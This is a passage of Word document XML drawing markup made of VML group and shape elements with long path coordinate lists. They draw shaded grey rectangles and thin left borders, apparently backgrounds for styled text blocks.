,1510,11654,1510,11646,1510,11639,1510,11631,1510,11623,1510,11615,1510,11606,1510,11598,1510,11589,1510,11580,1510,11571,1510,11561,1510,11552,1510,11542,1510,11532,1510,11522,1510,11511,1510,11500,1510,11490,1510,11478,1510,11467,1510,11455,1510,11444,1510,11432,1510,11419,1510,11407,1510,11394,1510,11381,1510,11368,1510,11354,1510,11340,1510,11326,1510,11312,1510,11297,1510,11283,1510,11268,1510,11252,1510,11237,1510,11221,1510,11205e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:559.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,11190" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:11190;width:30;height:650" coordorigin="1490,11190" coordsize="30,650" path="m1517,11205l1517,11205,1517,11205,1517,11205,1517,11205,1517,11205,1517,11205,1517,11205,1517,11205,1517,11205,1517,11205,1517,11205,1517,11205,1517,11205,1517,11205,1517,11206,1517,11206,1517,11206,1517,11207,1517,11207,1517,11207,1517,11208,1517,11208,1517,11209,1517,11209,1517,11210,1517,11211,1517,11211,1517,11212,1517,11213,1517,11214,1517,11215,1517,11216,1517,11217,1517,11218,1517,11220,1517,11221,1517,11223,1517,11224,1517,11226,1517,11227,1517,11229,1517,11231,1517,11233,1517,11235,1517,11237,1517,11240,1517,11242,1517,11244,1517,11247,1517,11250,1517,11253,1517,11255,1517,11258,1517,11262,1517,11265,1517,11268,1517,11272,1517,11276,1517,11279,1517,11283,1517,11287,1517,11292,1517,11296,1517,11300,1517,11305,1517,11310,1517,11315,1517,11320,1517,11325,1517,11330,1517,11336,1517,11342,1517,11348,1517,11354,1517,11360,1517,11366,1517,11373,1517,11379,1517,11386,1517,11393,1517,11401,1517,11408,1517,11416,1517,11424,1517,11432,1517,11440,1517,11448,1517,11457,1517,11466,1517,11475,1517,11484,1517,11493,1517,11503,1517,11513,1517,11523,1517,11533,1517,11543,1517,11554,1517,11565,1517,11576,1517,11588,1517,11599,1517,11611,1517,11623,1517,11635,1517,11648,1517,11661,1517,11674,1517,11687,1517,11701,1517,11714,1517,11728,1517,11743,1517,11757,1517,11772,1517,11787,1517,11802,1517,11818,1517,11834,1517,11850e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:591.500pt;width:449.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,11830" coordsize="8990,650">
        <v:shape style="position:absolute;left:1490;top:11830;width:8990;height:650" coordorigin="1490,11830" coordsize="8990,650" path="m1510,11850l1510,11850,1510,11850,1510,11850,1510,11850,1510,11850,1510,11850,1511,11850,1512,11850,1512,11850,1514,11850,1515,11850,1517,11850,1519,11850,1521,11850,1524,11850,1528,11850,1532,11850,1536,11850,1541,11850,1546,11850,1552,11850,1559,11850,1566,11850,1575,11850,1583,11850,1593,11850,1603,11850,1615,11850,1627,11850,1640,11850,1654,11850,1668,11850,1684,11850,1701,11850,1719,11850,1738,11850,1758,11850,1780,11850,1802,11850,1826,11850,1851,11850,1877,11850,1904,11850,1933,11850,1963,11850,1995,11850,2028,11850,2063,11850,2099,11850,2136,11850,2175,11850,2216,11850,2259,11850,2303,11850,2348,11850,2396,11850,2445,11850,2496,11850,2549,11850,2604,11850,2660,11850,2719,11850,2779,11850,2841,11850,2906,11850,2972,11850,3041,11850,3112,11850,3184,11850,3259,11850,3336,11850,3416,11850,3498,11850,3582,11850,3668,11850,3757,11850,3848,11850,3941,11850,4037,11850,4136,11850,4236,11850,4340,11850,4446,11850,4555,11850,4666,11850,4780,11850,4897,11850,5017,11850,5139,11850,5264,11850,5392,11850,5523,11850,5657,11850,5793,11850,5933,11850,6076,11850,6222,11850,6370,11850,6522,11850,6677,11850,6835,11850,6997,11850,7161,11850,7329,11850,7500,11850,7675,11850,7853,11850,8034,11850,8219,11850,8407,11850,8598,11850,8793,11850,8992,11850,9194,11850,9400,11850,9609,11850,9823,11850,10039,11850,10260,11850,10484,11850,10484,11850,10484,11850,10484,11850,10484,11850,10484,11850,10484,11850,10484,11850,10484,11850,10484,11850,10484,11850,10484,11850,10484,11850,10484,11851,10484,11851,10484,11851,10484,11851,10484,11852,10484,11852,10484,11852,10484,11853,10484,11853,10484,11853,10484,11854,10484,11855,10484,11855,10484,11856,10484,11857,10484,11857,10484,11858,10484,11859,10484,11860,10484,11861,10484,11862,10484,11863,10484,11865,10484,11866,10484,11867,10484,11869,10484,11870,10484,11872,10484,11874,10484,11876,10484,11878,10484,11880,10484,11882,10484,11884,10484,11886,10484,11889,10484,11891,10484,11894,10484,11897,10484,11900,10484,11903,10484,11906,10484,11909,10484,11912,10484,11916,10484,11919,10484,11923,10484,11927,10484,11931,10484,11935,10484,11939,10484,11943,10484,11948,10484,11953,10484,11958,10484,11962,10484,11968,10484,11973,10484,11978,10484,11984,10484,11990,10484,11995,10484,12002,10484,12008,10484,12014,10484,12021,10484,12027,10484,12034,10484,12041,10484,12049,10484,12056,10484,12064,10484,12072,10484,12080,10484,12088,10484,12096,10484,12105,10484,12114,10484,12123,10484,12132,10484,12141,10484,12151,10484,12161,10484,12171,10484,12181,10484,12191,10484,12202,10484,12213,10484,12224,10484,12235,10484,12247,10484,12259,10484,12271,10484,12283,10484,12295,10484,12308,10484,12321,10484,12334,10484,12348,10484,12362,10484,12375,10484,12390,10484,12404,10484,12419,10484,12434,10484,12449,10484,12465,10484,12480,10484,12480,10484,12480,10484,12480,10484,12480,10484,12480,10484,12480,10483,12480,10482,12480,10482,12480,10480,12480,10479,12480,10477,12480,10475,12480,10473,12480,10470,12480,10466,12480,10462,12480,10458,12480,10453,12480,10448,12480,10442,12480,10435,12480,10428,12480,10419,12480,10411,12480,10401,12480,10391,12480,10379,12480,10367,12480,10354,12480,10340,12480,10326,12480,10310,12480,10293,12480,10275,12480,10256,12480,10236,12480,10215,12480,10192,12480,10168,12480,10143,12480,10117,12480,10090,12480,10061,12480,10031,12480,9999,12480,9966,12480,9931,12480,9895,12480,9858,12480,9819,12480,9778,12480,9735,12480,9691,12480,9646,12480,9598,12480,9549,12480,9498,12480,9445,12480,9391,12480,9334,12480,9275,12480,9215,12480,9153,12480,9088,12480,9022,12480,8953,12480,8883,12480,8810,12480,8735,12480,8658,12480,8578,12480,8497,12480,8413,12480,8326,12480,8238,12480,8146,12480,8053,12480,7957,12480,7859,12480,7758,12480,7654,12480,7548,12480,7439,12480,7328,12480,7214,12480,7097,12480,6977,12480,6855,12480,6730,12480,6602,12480,6471,12480,6337,12480,6201,12480,6061,12480,5918,12480,5773,12480,5624,12480,5472,12480,5317,12480,5159,12480,4997,12480,4833,12480,4665,12480,4494,12480,4319,12480,4141,12480,3960,12480,3776,12480,3587,12480,3396,12480,3201,12480,3002,12480,2800,12480,2594,12480,2385,12480,2172,12480,1955,12480,1734,12480,1510,12480,1510,12480,1510,12480,1510,12480,1510,12480,1510,12480,1510,12480,1510,12480,1510,12480,1510,12480,1510,12480,1510,12480,1510,12480,1510,12480,1510,12479,1510,12479,1510,12479,1510,12479,1510,12478,1510,12478,1510,12478,1510,12477,1510,12477,1510,12476,1510,12476,1510,12475,1510,12474,1510,12474,1510,12473,1510,12472,1510,12471,1510,12470,1510,12469,1510,12468,1510,12467,1510,12466,1510,12464,1510,12463,1510,12461,1510,12460,1510,12458,1510,12456,1510,12455,1510,12453,1510,12451,1510,12448,1510,12446,1510,12444,1510,12441,1510,12439,1510,12436,1510,12434,1510,12431,1510,12428,1510,12425,1510,12421,1510,12418,1510,12415,1510,12411,1510,12407,1510,12403,1510,12399,1510,12395,1510,12391,1510,12387,1510,12382,1510,12378,1510,12373,1510,12368,1510,12363,1510,12357,1510,12352,1510,12346,1510,12341,1510,12335,1510,12329,1510,12322,1510,12316,1510,12310,1510,12303,1510,12296,1510,12289,1510,12282,1510,12274,1510,12266,1510,12259,1510,12251,1510,12242,1510,12234,1510,12225,1510,12217,1510,12208,1510,12198,1510,12189,1510,12179,1510,12170,1510,12160,1510,12149,1510,12139,1510,12128,1510,12117,1510,12106,1510,12095,1510,12083,1510,12072,1510,12060,1510,12047,1510,12035,1510,12022,1510,12009,1510,11996,1510,11982,1510,11969,1510,11955,1510,11941,1510,11926,1510,11911,1510,11896,1510,11881,1510,11866,1510,11850e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:591.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,11830" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:11830;width:30;height:650" coordorigin="1490,11830" coordsize="30,650" path="m1517,11850l1517,11850,1517,11850,1517,11850,1517,11850,1517,11850,1517,11850,1517,11850,1517,11850,1517,11850,1517,11850,1517,11850,1517,11850,1517,11851,1517,11851,1517,11851,1517,11851,1517,11852,1517,11852,1517,11852,1517,11853,1517,11853,1517,11853,1517,11854,1517,11855,1517,11855,1517,11856,1517,11857,1517,11857,1517,11858,1517,11859,1517,11860,1517,11861,1517,11862,1517,11863,1517,11865,1517,11866,1517,11867,1517,11869,1517,11870,1517,11872,1517,11874,1517,11876,1517,11878,1517,11880,1517,11882,1517,11884,1517,11886,1517,11889,1517,11891,1517,11894,1517,11897,1517,11900,1517,11903,1517,11906,1517,11909,1517,11912,1517,11916,1517,11919,1517,11923,1517,11927,1517,11931,1517,11935,1517,11939,1517,11943,1517,11948,1517,11953,1517,11958,1517,11962,1517,11968,1517,11973,1517,11978,1517,11984,1517,11990,1517,11995,1517,12002,1517,12008,1517,12014,1517,12021,1517,12027,1517,12034,1517,12041,1517,12049,1517,12056,1517,12064,1517,12072,1517,12080,1517,12088,1517,12096,1517,12105,1517,12114,1517,12123,1517,12132,1517,12141,1517,12151,1517,12161,1517,12171,1517,12181,1517,12191,1517,12202,1517,12213,1517,12224,1517,12235,1517,12247,1517,12259,1517,12271,1517,12283,1517,12295,1517,12308,1517,12321,1517,12334,1517,12348,1517,12362,1517,12375,1517,12390,1517,12404,1517,12419,1517,12434,1517,12449,1517,12465,1517,12480e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:623.500pt;width:449.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,12470" coordsize="8990,650">
        <v:shape style="position:absolute;left:1490;top:12470;width:8990;height:650" coordorigin="1490,12470" coordsize="8990,650" path="m1510,12480l1510,12480,1510,12480,1510,12480,1510,12480,1510,12480,1510,12480,1511,12480,1512,12480,1512,12480,1514,12480,1515,12480,1517,12480,1519,12480,1521,12480,1524,12480,1528,12480,1532,12480,1536,12480,1541,12480,1546,12480,1552,12480,1559,12480,1566,12480,1575,12480,1583,12480,1593,12480,1603,12480,1615,12480,1627,12480,1640,12480,1654,12480,1668,12480,1684,12480,1701,12480,1719,12480,1738,12480,1758,12480,1780,12480,1802,12480,1826,12480,1851,12480,1877,12480,1904,12480,1933,12480,1963,12480,1995,12480,2028,12480,2063,12480,2099,12480,2136,12480,2175,12480,2216,12480,2259,12480,2303,12480,2348,12480,2396,12480,2445,12480,2496,12480,2549,12480,2604,12480,2660,12480,2719,12480,2779,12480,2841,12480,2906,12480,2972,12480,3041,12480,3112,12480,3184,12480,3259,12480,3336,12480,3416,12480,3498,12480,3582,12480,3668,12480,3757,12480,3848,12480,3941,12480,4037,12480,4136,12480,4236,12480,4340,12480,4446,12480,4555,12480,4666,12480,4780,12480,4897,12480,5017,12480,5139,12480,5264,12480,5392,12480,5523,12480,5657,12480,5793,12480,5933,12480,6076,12480,6222,12480,6370,12480,6522,12480,6677,12480,6835,12480,6997,12480,7161,12480,7329,12480,7500,12480,7675,12480,7853,12480,8034,12480,8219,12480,8407,12480,8598,12480,8793,12480,8992,12480,9194,12480,9400,12480,9609,12480,9823,12480,10039,12480,10260,12480,10484,12480,10484,12480,10484,12480,10484,12480,10484,12480,10484,12480,10484,12480,10484,12480,10484,12480,10484,12480,10484,12481,10484,12481,10484,12481,10484,12481,10484,12481,10484,12481,10484,12482,10484,12482,10484,12482,10484,12483,10484,12483,10484,12483,10484,12484,10484,12484,10484,12485,10484,12486,10484,12486,10484,12487,10484,12488,10484,12489,10484,12490,10484,12491,10484,12492,10484,12493,10484,12494,10484,12495,10484,12497,10484,12498,10484,12500,10484,12501,10484,12503,10484,12505,10484,12507,10484,12509,10484,12511,10484,12513,10484,12515,10484,12518,10484,12520,10484,12523,10484,12525,10484,12528,10484,12531,10484,12534,10484,12537,10484,12541,10484,12544,10484,12548,10484,12551,10484,12555,10484,12559,10484,12563,10484,12567,10484,12572,10484,12576,10484,12581,10484,12585,10484,12590,10484,12595,10484,12601,10484,12606,10484,12612,10484,12617,10484,12623,10484,12629,10484,12635,10484,12642,10484,12648,10484,12655,10484,12662,10484,12669,10484,12676,10484,12684,10484,12691,10484,12699,10484,12707,10484,12715,10484,12724,10484,12732,10484,12741,10484,12750,10484,12759,10484,12769,10484,12778,10484,12788,10484,12798,10484,12809,10484,12819,10484,12830,10484,12841,10484,12852,10484,12863,10484,12875,10484,12887,10484,12899,10484,12911,10484,12924,10484,12936,10484,12949,10484,12963,10484,12976,10484,12990,10484,13004,10484,13018,10484,13033,10484,13048,10484,13063,10484,13078,10484,13094,10484,13109,10484,13126,10484,13126,10484,13126,10484,13126,10484,13126,10484,13126,10484,13126,10483,13126,10482,13126,10482,13126,10480,13126,10479,13126,10477,13126,10475,13126,10473,13126,10470,13126,10466,13126,10462,13126,10458,13126,10453,13126,10448,13126,10442,13126,10435,13126,10428,13126,10419,13126,10411,13126,10401,13126,10391,13126,10379,13126,10367,13126,10354,13126,10340,13126,10326,13126,10310,13126,10293,13126,10275,13126,10256,13126,10236,13126,10215,13126,10192,13126,10168,13126,10143,13126,10117,13126,10090,13126,10061,13126,10031,13126,9999,13126,9966,13126,9931,13126,9895,13126,9858,13126,9819,13126,9778,13126,9735,13126,9691,13126,9646,13126,9598,13126,9549,13126,9498,13126,9445,13126,9391,13126,9334,13126,9275,13126,9215,13126,9153,13126,9088,13126,9022,13126,8953,13126,8883,13126,8810,13126,8735,13126,8658,13126,8578,13126,8497,13126,8413,13126,8326,13126,8238,13126,8146,13126,8053,13126,7957,13126,7859,13126,7758,13126,7654,13126,7548,13126,7439,13126,7328,13126,7214,13126,7097,13126,6977,13126,6855,13126,6730,13126,6602,13126,6471,13126,6337,13126,6201,13126,6061,13126,5918,13126,5773,13126,5624,13126,5472,13126,5317,13126,5159,13126,4997,13126,4833,13126,4665,13126,4494,13126,4319,13126,4141,13126,3960,13126,3776,13126,3587,13126,3396,13126,3201,13126,3002,13126,2800,13126,2594,13126,2385,13126,2172,13126,1955,13126,1734,13126,1510,13126,1510,13126,1510,13126,1510,13126,1510,13126,1510,13126,1510,13126,1510,13126,1510,13125,1510,13125,1510,13125,1510,13125,1510,13125,1510,13125,1510,13125,1510,13125,1510,13124,1510,13124,1510,13124,1510,13123,1510,13123,1510,13123,1510,13122,1510,13122,1510,13121,1510,13120,1510,13120,1510,13119,1510,13118,1510,13117,1510,13116,1510,13115,1510,13114,1510,13113,1510,13112,1510,13111,1510,13109,1510,13108,1510,13106,1510,13105,1510,13103,1510,13101,1510,13099,1510,13097,1510,13095,1510,13093,1510,13091,1510,13088,1510,13086,1510,13083,1510,13081,1510,13078,1510,13075,1510,13072,1510,13069,1510,13065,1510,13062,1510,13058,1510,13055,1510,13051,1510,13047,1510,13043,1510,13039,1510,13034,1510,13030,1510,13025,1510,13020,1510,13016,1510,13010,1510,13005,1510,13000,1510,12994,1510,12989,1510,12983,1510,12977,1510,12970,1510,12964,1510,12958,1510,12951,1510,12944,1510,12937,1510,12930,1510,12922,1510,12914,1510,12907,1510,12899,1510,12890,1510,12882,1510,12873,1510,12865,1510,12856,1510,12846,1510,12837,1510,12827,1510,12818,1510,12808,1510,12797,1510,12787,1510,12776,1510,12765,1510,12754,1510,12743,1510,12731,1510,12719,1510,12707,1510,12695,1510,12682,1510,12670,1510,12656,1510,12643,1510,12630,1510,12616,1510,12602,1510,12588,1510,12573,1510,12558,1510,12543,1510,12528,1510,12512,1510,12496,1510,12480e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:623.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,12470" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:12470;width:30;height:650" coordorigin="1490,12470" coordsize="30,650" path="m1517,12480l1517,12480,1517,12480,1517,12480,1517,12480,1517,12480,1517,12480,1517,12480,1517,12480,1517,12480,1517,12481,1517,12481,1517,12481,1517,12481,1517,12481,1517,12481,1517,12482,1517,12482,1517,12482,1517,12483,1517,12483,1517,12483,1517,12484,1517,12484,1517,12485,1517,12486,1517,12486,1517,12487,1517,12488,1517,12489,1517,12490,1517,12491,1517,12492,1517,12493,1517,12494,1517,12495,1517,12497,1517,12498,1517,12500,1517,12501,1517,12503,1517,12505,1517,12507,1517,12509,1517,12511,1517,12513,1517,12515,1517,12518,1517,12520,1517,12523,1517,12525,1517,12528,1517,12531,1517,12534,1517,12537,1517,12541,1517,12544,1517,12548,1517,12551,1517,12555,1517,12559,1517,12563,1517,12567,1517,12572,1517,12576,1517,12581,1517,12585,1517,12590,1517,12595,1517,12601,1517,12606,1517,12612,1517,12617,1517,12623,1517,12629,1517,12635,1517,12642,1517,12648,1517,12655,1517,12662,1517,12669,1517,12676,1517,12684,1517,12691,1517,12699,1517,12707,1517,12715,1517,12724,1517,12732,1517,12741,1517,12750,1517,12759,1517,12769,1517,12778,1517,12788,1517,12798,1517,12809,1517,12819,1517,12830,1517,12841,1517,12852,1517,12863,1517,12875,1517,12887,1517,12899,1517,12911,1517,12924,1517,12936,1517,12949,1517,12963,1517,12976,1517,12990,1517,13004,1517,13018,1517,13033,1517,13048,1517,13063,1517,13078,1517,13094,1517,13109,1517,13126e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:655.500pt;width:449.500pt;height:31.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,13110" coordsize="8990,630">
        <v:shape style="position:absolute;left:1490;top:13110;width:8990;height:630" coordorigin="1490,13110" coordsize="8990,630" path="m1510,13126l1510,13126,1510,13126,1510,13126,1510,13126,1510,13126,1510,13126,1511,13126,1512,13126,1512,13126,1514,13126,1515,13126,1517,13126,1519,13126,1521,13126,1524,13126,1528,13126,1532,13126,1536,13126,1541,13126,1546,13126,1552,13126,1559,13126,1566,13126,1575,13126,1583,13126,1593,13126,1603,13126,1615,13126,1627,13126,1640,13126,1654,13126,1668,13126,1684,13126,1701,13126,1719,13126,1738,13126,1758,13126,1780,13126,1802,13126,1826,13126,1851,13126,1877,13126,1904,13126,1933,13126,1963,13126,1995,13126,2028,13126,2063,13126,2099,13126,2136,13126,2175,13126,2216,13126,2259,13126,2303,13126,2348,13126,2396,13126,2445,13126,2496,13126,2549,13126,2604,13126,2660,13126,2719,13126,2779,13126,2841,13126,2906,13126,2972,13126,3041,13126,3112,13126,3184,13126,3259,13126,3336,13126,3416,13126,3498,13126,3582,13126,3668,13126,3757,13126,3848,13126,3941,13126,4037,13126,4136,13126,4236,13126,4340,13126,4446,13126,4555,13126,4666,13126,4780,13126,4897,13126,5017,13126,5139,13126,5264,13126,5392,13126,5523,13126,5657,13126,5793,13126,5933,13126,6076,13126,6222,13126,6370,13126,6522,13126,6677,13126,6835,13126,6997,13126,7161,13126,7329,13126,7500,13126,7675,13126,7853,13126,8034,13126,8219,13126,8407,13126,8598,13126,8793,13126,8992,13126,9194,13126,9400,13126,9609,13126,9823,13126,10039,13126,10260,13126,10484,13126,10484,13126,10484,13126,10484,13126,10484,13126,10484,13126,10484,13126,10484,13126,10484,13126,10484,13126,10484,13126,10484,13126,10484,13126,10484,13126,10484,13126,10484,13127,10484,13127,10484,13127,10484,13127,10484,13128,10484,13128,10484,13129,10484,13129,10484,13130,10484,13130,10484,13131,10484,13131,10484,13132,10484,13133,10484,13134,10484,13135,10484,13136,10484,13137,10484,13138,10484,13139,10484,13140,10484,13142,10484,13143,10484,13145,10484,13146,10484,13148,10484,13150,10484,13151,10484,13153,10484,13155,10484,13157,10484,13160,10484,13162,10484,13164,10484,13167,10484,13170,10484,13172,10484,13175,10484,13178,10484,13181,10484,13185,10484,13188,10484,13191,10484,13195,10484,13199,10484,13202,10484,13206,10484,13211,10484,13215,10484,13219,10484,13224,10484,13228,10484,13233,10484,13238,10484,13243,10484,13248,10484,13254,10484,13259,10484,13265,10484,13271,10484,13277,10484,13283,10484,13290,10484,13296,10484,13303,10484,13310,10484,13317,10484,13324,10484,13332,10484,13339,10484,13347,10484,13355,10484,13364,10484,13372,10484,13381,10484,13389,10484,13398,10484,13407,10484,13417,10484,13426,10484,13436,10484,13446,10484,13457,10484,13467,10484,13478,10484,13489,10484,13500,10484,13511,10484,13523,10484,13534,10484,13546,10484,13559,10484,13571,10484,13584,10484,13597,10484,13610,10484,13623,10484,13637,10484,13651,10484,13665,10484,13680,10484,13694,10484,13709,10484,13725,10484,13740,10484,13756,10484,13756,10484,13756,10484,13756,10484,13756,10484,13756,10484,13756,10483,13756,10482,13756,10482,13756,10480,13756,10479,13756,10477,13756,10475,13756,10473,13756,10470,13756,10466,13756,10462,13756,10458,13756,10453,13756,10448,13756,10442,13756,10435,13756,10428,13756,10419,13756,10411,13756,10401,13756,10391,13756,10379,13756,10367,13756,10354,13756,10340,13756,10326,13756,10310,13756,10293,13756,10275,13756,10256,13756,10236,13756,10215,13756,10192,13756,10168,13756,10143,13756,10117,13756,10090,13756,10061,13756,10031,13756,9999,13756,9966,13756,9931,13756,9895,13756,9858,13756,9819,13756,9778,13756,9735,13756,9691,13756,9646,13756,9598,13756,9549,13756,9498,13756,9445,13756,9391,13756,9334,13756,9275,13756,9215,13756,9153,13756,9088,13756,9022,13756,8953,13756,8883,13756,8810,13756,8735,13756,8658,13756,8578,13756,8497,13756,8413,13756,8326,13756,8238,13756,8146,13756,8053,13756,7957,13756,7859,13756,7758,13756,7654,13756,7548,13756,7439,13756,7328,13756,7214,13756,7097,13756,6977,13756,6855,13756,6730,13756,6602,13756,6471,13756,6337,13756,6201,13756,6061,13756,5918,13756,5773,13756,5624,13756,5472,13756,5317,13756,5159,13756,4997,13756,4833,13756,4665,13756,4494,13756,4319,13756,4141,13756,3960,13756,3776,13756,3587,13756,3396,13756,3201,13756,3002,13756,2800,13756,2594,13756,2385,13756,2172,13756,1955,13756,1734,13756,1510,13756,1510,13756,1510,13756,1510,13756,1510,13756,1510,13756,1510,13756,1510,13756,1510,13756,1510,13756,1510,13756,1510,13756,1510,13755,1510,13755,1510,13755,1510,13755,1510,13755,1510,13754,1510,13754,1510,13754,1510,13753,1510,13753,1510,13752,1510,13752,1510,13751,1510,13751,1510,13750,1510,13749,1510,13749,1510,13748,1510,13747,1510,13746,1510,13745,1510,13744,1510,13742,1510,13741,1510,13740,1510,13738,1510,13737,1510,13735,1510,13734,1510,13732,1510,13730,1510,13728,1510,13726,1510,13724,1510,13722,1510,13720,1510,13717,1510,13715,1510,13712,1510,13709,1510,13706,1510,13703,1510,13700,1510,13697,1510,13694,1510,13690,1510,13687,1510,13683,1510,13679,1510,13675,1510,13671,1510,13667,1510,13662,1510,13658,1510,13653,1510,13648,1510,13643,1510,13638,1510,13633,1510,13628,1510,13622,1510,13616,1510,13610,1510,13604,1510,13598,1510,13592,1510,13585,1510,13578,1510,13572,1510,13564,1510,13557,1510,13550,1510,13542,1510,13534,1510,13526,1510,13518,1510,13510,1510,13501,1510,13492,1510,13483,1510,13474,1510,13465,1510,13455,1510,13445,1510,13435,1510,13425,1510,13415,1510,13404,1510,13393,1510,13382,1510,13371,1510,13359,1510,13347,1510,13335,1510,13323,1510,13310,1510,13298,1510,13285,1510,13272,1510,13258,1510,13244,1510,13230,1510,13216,1510,13202,1510,13187,1510,13172,1510,13157,1510,13141,1510,13126e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:655.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,13110" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:13110;width:30;height:650" coordorigin="1490,13110" coordsize="30,650" path="m1517,13126l1517,13126,1517,13126,1517,13126,1517,13126,1517,13126,1517,13126,1517,13126,1517,13126,1517,13126,1517,13126,1517,13126,1517,13126,1517,13126,1517,13126,1517,13127,1517,13127,1517,13127,1517,13127,1517,13128,1517,13128,1517,13129,1517,13129,1517,13130,1517,13130,1517,13131,1517,13131,1517,13132,1517,13133,1517,13134,1517,13135,1517,13136,1517,13137,1517,13138,1517,13139,1517,13140,1517,13142,1517,13143,1517,13145,1517,13146,1517,13148,1517,13150,1517,13151,1517,13153,1517,13155,1517,13157,1517,13160,1517,13162,1517,13164,1517,13167,1517,13170,1517,13172,1517,13175,1517,13178,1517,13181,1517,13185,1517,13188,1517,13191,1517,13195,1517,13199,1517,13202,1517,13206,1517,13211,1517,13215,1517,13219,1517,13224,1517,13228,1517,13233,1517,13238,1517,13243,1517,13248,1517,13254,1517,13259,1517,13265,1517,13271,1517,13277,1517,13283,1517,13290,1517,13296,1517,13303,1517,13310,1517,13317,1517,13324,1517,13332,1517,13339,1517,13347,1517,13355,1517,13364,1517,13372,1517,13381,1517,13389,1517,13398,1517,13407,1517,13417,1517,13426,1517,13436,1517,13446,1517,13457,1517,13467,1517,13478,1517,13489,1517,13500,1517,13511,1517,13523,1517,13534,1517,13546,1517,13559,1517,13571,1517,13584,1517,13597,1517,13610,1517,13623,1517,13637,1517,13651,1517,13665,1517,13680,1517,13694,1517,13709,1517,13725,1517,13740,1517,13756e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:686.500pt;width:449.500pt;height:33.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,13730" coordsize="8990,670">
        <v:shape style="position:absolute;left:1490;top:13730;width:8990;height:670" coordorigin="1490,13730" coordsize="8990,670" path="m1510,13756l1510,13756,1510,13756,1510,13756,1510,13756,1510,13756,1510,13756,1511,13756,1512,13756,1512,13756,1514,13756,1515,13756,1517,13756,1519,13756,1521,13756,1524,13756,1528,13756,1532,13756,1536,13756,1541,13756,1546,13756,1552,13756,1559,13756,1566,13756,1575,13756,1583,13756,1593,13756,1603,13756,1615,13756,1627,13756,1640,13756,1654,13756,1668,13756,1684,13756,1701,13756,1719,13756,1738,13756,1758,13756,1780,13756,1802,13756,1826,13756,1851,13756,1877,13756,1904,13756,1933,13756,1963,13756,1995,13756,2028,13756,2063,13756,2099,13756,2136,13756,2175,13756,2216,13756,2259,13756,2303,13756,2348,13756,2396,13756,2445,13756,2496,13756,2549,13756,2604,13756,2660,13756,2719,13756,2779,13756,2841,13756,2906,13756,2972,13756,3041,13756,3112,13756,3184,13756,3259,13756,3336,13756,3416,13756,3498,13756,3582,13756,3668,13756,3757,13756,3848,13756,3941,13756,4037,13756,4136,13756,4236,13756,4340,13756,4446,13756,4555,13756,4666,13756,4780,13756,4897,13756,5017,13756,5139,13756,5264,13756,5392,13756,5523,13756,5657,13756,5793,13756,5933,13756,6076,13756,6222,13756,6370,13756,6522,13756,6677,13756,6835,13756,6997,13756,7161,13756,7329,13756,7500,13756,7675,13756,7853,13756,8034,13756,8219,13756,8407,13756,8598,13756,8793,13756,8992,13756,9194,13756,9400,13756,9609,13756,9823,13756,10039,13756,10260,13756,10484,13756,10484,13756,10484,13756,10484,13756,10484,13756,10484,13756,10484,13756,10484,13756,10484,13756,10484,13756,10484,13756,10484,13756,10484,13756,10484,13757,10484,13757,10484,13757,10484,13757,10484,13757,10484,13758,10484,13758,10484,13759,10484,13759,10484,13759,10484,13760,10484,13761,10484,13761,10484,13762,10484,13763,10484,13763,10484,13764,10484,13765,10484,13766,10484,13767,10484,13768,10484,13770,10484,13771,10484,13772,10484,13774,10484,13775,10484,13777,10484,13779,10484,13780,10484,13782,10484,13784,10484,13786,10484,13789,10484,13791,10484,13793,10484,13796,10484,13798,10484,13801,10484,13804,10484,13807,10484,13810,10484,13813,10484,13816,10484,13820,10484,13823,10484,13827,10484,13831,10484,13835,10484,13839,10484,13843,10484,13847,10484,13852,10484,13856,10484,13861,10484,13866,10484,13871,10484,13876,10484,13882,10484,13887,10484,13893,10484,13899,10484,13905,10484,13911,10484,13917,10484,13924,10484,13931,10484,13938,10484,13945,10484,13952,10484,13959,10484,13967,10484,13975,10484,13983,10484,13991,10484,14000,104